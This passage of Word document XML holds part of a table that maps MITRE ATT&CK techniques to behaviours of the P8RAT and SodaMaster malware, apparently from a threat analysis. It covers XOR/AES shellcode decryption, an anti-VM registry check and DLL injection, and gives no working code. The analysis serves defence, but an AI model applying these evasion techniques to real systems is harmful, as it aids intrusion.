            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206E7543" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E610D9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="489556F1" w14:textId="056CFA17" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24353FF5" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRPr="00B857D7" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29E35CC4" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="126A9EFA" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C2BD78E" w14:textId="77777777" w:rsidR="00720F1A" w:rsidRDefault="00720F1A" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00720F1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The crypto algorithms are again one-byte XOR and AES CBC mode, this time to decrypt the fourth loader shellcode from the embedded data of ‘pcasvc.dll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F619325" w14:textId="5C857359" w:rsidR="00E008C4" w:rsidRPr="008D6D8A" w:rsidRDefault="00E008C4" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E008C4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The payload of the first type shellcode is either “P8RAT” or “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00E008C4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>FYAnti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E008C4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> loader”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D33D1" w:rsidRPr="00B857D7" w14:paraId="072C57EE" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4573990A" w14:textId="3EB38556" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC2E327" w14:textId="6E69C877" w:rsidR="004D33D1" w:rsidRPr="006621ED" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>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400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15915D29" w14:textId="29C4839A" w:rsidR="004D33D1" w:rsidRPr="007674EE" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004D33D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1497.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004D33D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Virtualization/Sandbox Evasion: System Checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AFA977" w14:textId="542411F6" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6204FD37" w14:textId="77777777" w:rsidR="004D33D1" w:rsidRPr="00B857D7" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74730FA7" w14:textId="33737627" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2C705A" w14:textId="095D0A0D" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D33D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F673B9" w14:textId="77777777" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00C31A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C31A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C31A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> module also shows an anti-VM feature. The malware looks for the presence of the registry key “HKEY_CLASSES_ROOT\\Applications</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDF221C" w14:textId="799A33E0" w:rsidR="004D33D1" w:rsidRDefault="004D33D1" w:rsidP="004D33D1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C31A81">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\\VMwareHostOpen.exe” on the victim’s system before proceeding to its main functionality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0075689E" w:rsidRPr="0075689E" w14:paraId="572BFF02" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CB2A642" w14:textId="361E97DC" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA100A6" w14:textId="16368DBE" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A2D5DE" w14:textId="40FE79D1" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1012 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Query Registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF37F44" w14:textId="75F4325B" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14661079" w14:textId="77777777" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A92B159" w14:textId="34047CCA" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58AA706F" w14:textId="1E54FB8B" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA828A5" w14:textId="3FE6CDDD" w:rsidR="006511BA" w:rsidRPr="0075689E" w:rsidRDefault="006511BA" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0075689E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B7D5D" w:rsidRPr="00B857D7" w14:paraId="457FDAE2" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="671B0BFC" w14:textId="57B8961D" w:rsidR="008B7D5D" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13A7A994" w14:textId="29448EF6" w:rsidR="008B7D5D" w:rsidRPr="00B857D7" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">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22213CE1" w14:textId="0A0B318E" w:rsidR="008B7D5D" w:rsidRPr="00B857D7" w:rsidRDefault="007674EE" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007674EE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1055.001</w:t>
            </w:r>
            <w:r w:rsidR="008B7D5D" w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="008B7D5D" w:rsidRPr="005F0E0E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007674EE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Process Injection: Dynamic-link Library Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70293A5C" w14:textId="0E07C956" w:rsidR="008B7D5D" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78B0C538" w14:textId="77777777" w:rsidR="008B7D5D" w:rsidRPr="00B857D7" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308AE177" w14:textId="4DDDA618" w:rsidR="008B7D5D" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF87044" w14:textId="4B39CEF2" w:rsidR="008B7D5D" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F7B8F9" w14:textId="713DAA04" w:rsidR="008B7D5D" w:rsidRPr="008D6D8A" w:rsidRDefault="008B7D5D" w:rsidP="008B7D5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">P8RAT/SODAMASTER - [5] </w:t>
            </w:r>
            <w:r w:rsidRPr="008B7D5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C6F56" w:rsidRPr="00A44889" w14:paraId="5F0D08CC" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53907CD1" w14:textId="2CA5127E" w:rsidR="009C6F56" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6911470C" w14:textId="367EA8EA" w:rsidR="009C6F56" w:rsidRDefault="001609E0" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56DF917E" w14:textId="498E847E" w:rsidR="009C6F56" w:rsidRPr="00A44889" w:rsidRDefault="009C6F56" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C6F56">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1027</w:t>
            </w:r>
            <w:r w:rsidR="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001609E0" w:rsidRPr="001609E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
